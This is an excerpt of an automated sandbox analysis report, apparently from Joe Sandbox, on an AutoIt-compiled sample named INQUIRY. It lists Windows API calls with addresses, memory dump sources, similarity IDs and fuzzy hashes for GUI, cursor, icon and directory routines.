• GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A9AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 00A9AA32
• DrawFocusRect.USER32(?,?), ref: 00A9AA3D
• GetSysColor.USER32(00000011), ref: 00A9AA4B
• SetTextColor.GDI32(?,00000000), ref: 00A9AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A9AA67
• SelectObject.GDI32(?,00A9A5FA), ref: 00A9AA7E
• DeleteObject.GDI32(?), ref: 00A9AA89
• SelectObject.GDI32(?,?), ref: 00A9AA8F
• DeleteObject.GDI32(?), ref: 00A9AA94
• SetTextColor.GDI32(?,?), ref: 00A9AA9A
• SetBkColor.GDI32(?,?), ref: 00A9AAA4
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0

APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A98AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98AD2
• CharNextW.USER32(0000014E), ref: 00A98B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A98B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A98B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A98B86
• SetWindowTextW.USER32(?,0000014E), ref: 00A98BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A98BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00A98C1F
• _memset.LIBCMT ref: 00A98C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A98C8D
• _memset.LIBCMT ref: 00A98CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A98D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00A98D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00A98E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00A98E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98EB4
• DrawMenuBar.USER32(?), ref: 00A98EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00A98EEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209

APIs
• GetCursorPos.USER32(?), ref: 00A949CA
• GetDesktopWindow.USER32 ref: 00A949DF
• GetWindowRect.USER32(00000000), ref: 00A949E6
• GetWindowLongW.USER32(?,000000F0), ref: 00A94A48
• DestroyWindow.USER32(?), ref: 00A94A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A94A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A94ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A94AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00A94AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A94B09
• IsWindowVisible.USER32(?), ref: 00A94B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A94B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A94B58
• GetWindowRect.USER32(?,?), ref: 00A94B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00A94B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00A94BB0
• CopyRect.USER32(?,?), ref: 00A94BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00A94C32
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822

APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128BC
• GetSystemMetrics.USER32(00000007), ref: 00A128C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128EF
• GetSystemMetrics.USER32(00000008), ref: 00A128F7
• GetSystemMetrics.USER32(00000004), ref: 00A1291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A12939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A12949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A1297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A12990
• GetClientRect.USER32(00000000,000000FF), ref: 00A129AE
• GetStockObject.GDI32(00000011), ref: 00A129CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00A129D5
  • Part of subcall function 00A12344: GetCursorPos.USER32(?), ref: 00A12357
  • Part of subcall function 00A12344: ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
  • Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000001), ref: 00A12399
  • Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000002), ref: 00A123A7
• SetTimer.USER32(00000000,00000000,00000028,00A11256), ref: 00A129FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A6A47A
                                                                                              • __swprintf.LIBCMT ref: 00A6A51B
                                                                                              • _wcscmp.LIBCMT ref: 00A6A52E
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A6A583
                                                                                              • _wcscmp.LIBCMT ref: 00A6A5BF
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A6A5F6
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00A6A648
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A6A67E
                                                                                              • GetParent.USER32(?), ref: 00A6A69C
                                                                                              • ScreenToClient.USER32(00000000), ref: 00A6A6A3
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A6A71D
                                                                                              • _wcscmp.LIBCMT ref: 00A6A731
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00A6A757
                                                                                              • _wcscmp.LIBCMT ref: 00A6A76B
                                                                                                • Part of subcall function 00A3362C: _iswctype.LIBCMT ref: 00A33634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 3744389584-679674701
                                                                                              • Opcode ID: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
                                                                                              • Instruction ID: 783eec5c5b9b47414eefa268944d5e8df9a3ade6b0ea201a5a95e717454f21bc
                                                                                              • Opcode Fuzzy Hash: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
                                                                                              • Instruction Fuzzy Hash: 48A1D171204306AFDB14DF64C884BAAB7F8FF54355F108529F99AE2190DB30E956CF92
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00A6AF18
                                                                                              • _wcscmp.LIBCMT ref: 00A6AF29
                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A6AF51
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00A6AF6E
                                                                                              • _wcscmp.LIBCMT ref: 00A6AF8C
                                                                                              • _wcsstr.LIBCMT ref: 00A6AF9D
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A6AFD5
                                                                                              • _wcscmp.LIBCMT ref: 00A6AFE5
                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A6B00C
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A6B055
                                                                                              • _wcscmp.LIBCMT ref: 00A6B065
                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00A6B08D
                                                                                              • GetWindowRect.USER32(00000004,?), ref: 00A6B0F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                              • String ID: @$ThumbnailClass
                                                                                              • API String ID: 1788623398-1539354611
                                                                                              • Opcode ID: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
                                                                                              • Instruction ID: fdb058d5a525f141317cd6d1ed46e9d0c0860e5f4d17acaa2fc4be25a5caf34d
                                                                                              • Opcode Fuzzy Hash: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
                                                                                              • Instruction Fuzzy Hash: B6819D72118205AFDB05DF14C981BAA7BF8EF54314F04856AFD85DA092DB34DD8ACBA2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                              • API String ID: 1038674560-1810252412
                                                                                              • Opcode ID: 594b04723074ee370047b35e34c9d57a64ed6dd6053a3cfe207f40f7b308bf14
                                                                                              • Instruction ID: a7b3517266be784fcee3861e5ad5e5c72d90640021cebc76ec8a6312f1915831
                                                                                              • Opcode Fuzzy Hash: 594b04723074ee370047b35e34c9d57a64ed6dd6053a3cfe207f40f7b308bf14
                                                                                              • Instruction Fuzzy Hash: 51313C71A48209BADB14EBA1DF43FEE77B4BB20790F600929F456710D1EF616F448E52
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00A85013
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00A8501E
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00A85029
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00A85034
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00A8503F
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00A8504A
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00A85055
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00A85060
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00A8506B
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00A85076
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00A85081
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00A8508C
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00A85097
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00A850A2
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00A850AD
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00A850B8
                                                                                              • GetCursorInfo.USER32(?), ref: 00A850C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$Info
                                                                                              • String ID:
                                                                                              • API String ID: 2577412497-0
                                                                                              • Opcode ID: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
                                                                                              • Instruction ID: fbf90e3bd0cfd9787ba1890038790f9d22022aeed4bb854bdf03859d2af20b94
                                                                                              • Opcode Fuzzy Hash: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
                                                                                              • Instruction Fuzzy Hash: 4F31E3B1D483196ADB10AFB68C8999FBFF8FB04750F50452AA54DE7280DA7865018F91
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A9A259
                                                                                              • DestroyWindow.USER32(?,?), ref: 00A9A2D3
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A9A34D
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A9A36F
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A382
                                                                                              • DestroyWindow.USER32(00000000), ref: 00A9A3A4
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00A9A3DB
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A3F4
                                                                                              • GetDesktopWindow.USER32 ref: 00A9A40D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A9A414
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A9A42C
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A9A444
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 1297703922-3619404913
                                                                                              • Opcode ID: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
                                                                                              • Instruction ID: 3e5020f7b20b483f33b226857c5670e898848929ec521b513cbf646afca974ef
                                                                                              • Opcode Fuzzy Hash: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
                                                                                              • Instruction Fuzzy Hash: 2971AE71640344AFDB21CF68CC49FAA77E5FB98300F04451EF9868B2A0DB70E942DB92
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00A9C627
                                                                                                • Part of subcall function 00A9AB37: ClientToScreen.USER32(?,?), ref: 00A9AB60
                                                                                                • Part of subcall function 00A9AB37: GetWindowRect.USER32(?,?), ref: 00A9ABD6
                                                                                                • Part of subcall function 00A9AB37: PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C690
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A9C69B
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A9C6BE
                                                                                              • _wcscat.LIBCMT ref: 00A9C6EE
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A9C705
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C71E
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C735
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C757
                                                                                              • DragFinish.SHELL32(?), ref: 00A9C75E
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A9C851
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 169749273-3440237614
                                                                                              • Opcode ID: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
                                                                                              • Instruction ID: 902ae1e83ec8d03131448b5055f656e8a8e8f2c3a228e52a7bd0bc442fb593ea
                                                                                              • Opcode Fuzzy Hash: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
                                                                                              • Instruction Fuzzy Hash: A4615B71608300AFCB01EFA4DD85DAFBBE8FF89750F10092EF695961A1DB709949CB52
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A94424
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A9446F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 3974292440-4258414348
                                                                                              • Opcode ID: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
                                                                                              • Instruction ID: 133a1afa2e17072ddc508650a1af4ecc87eb996f50c472142c66aaa567835214
                                                                                              • Opcode Fuzzy Hash: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
                                                                                              • Instruction Fuzzy Hash: 30913C716047019FCB04EF20C561EAEB7E5AF99394F05486CF8965B3A2CB31ED4ACB85
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A9B8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A96B11,?), ref: 00A9B910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A9B98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B9C3
• FreeLibrary.KERNEL32(?), ref: 00A9B9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9B9DF
• DestroyIcon.USER32(?), ref: 00A9B9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A9BA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A9BA17
  • Part of subcall function 00A32EFD: __wcsicmp_l.LIBCMT ref: 00A32F86
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 2bbb1de0e50905641c05d5e16976a5bc4f04370e913d2f80a291d4df4a5fab59
• Instruction ID: 540f3e38bd8db24812f0175e8296aa5e1ef80d1e95f096971fdc32deabd0b559
APIs
• GetLocalTime.KERNEL32(?), ref: 00A7DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A7DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A7DCF8
• __wsplitpath.LIBCMT ref: 00A7DD56
• _wcscat.LIBCMT ref: 00A7DD6E
• _wcscat.LIBCMT ref: 00A7DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A7DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDFC
• _wcscpy.LIBCMT ref: 00A7DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A7DE47
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: c9e2fb9a145c4450b3a9cc5188de248c6d29c38946580fb6b560daf6337eee16
• Instruction ID: c52e3f4cd646ebab6d6ee0811d7fd2e3b8eba3735a3274114f62a55beb00e4a0
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00A79C7F
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A79CA0
• __swprintf.LIBCMT ref: 00A79CF9
• __swprintf.LIBCMT ref: 00A79D12
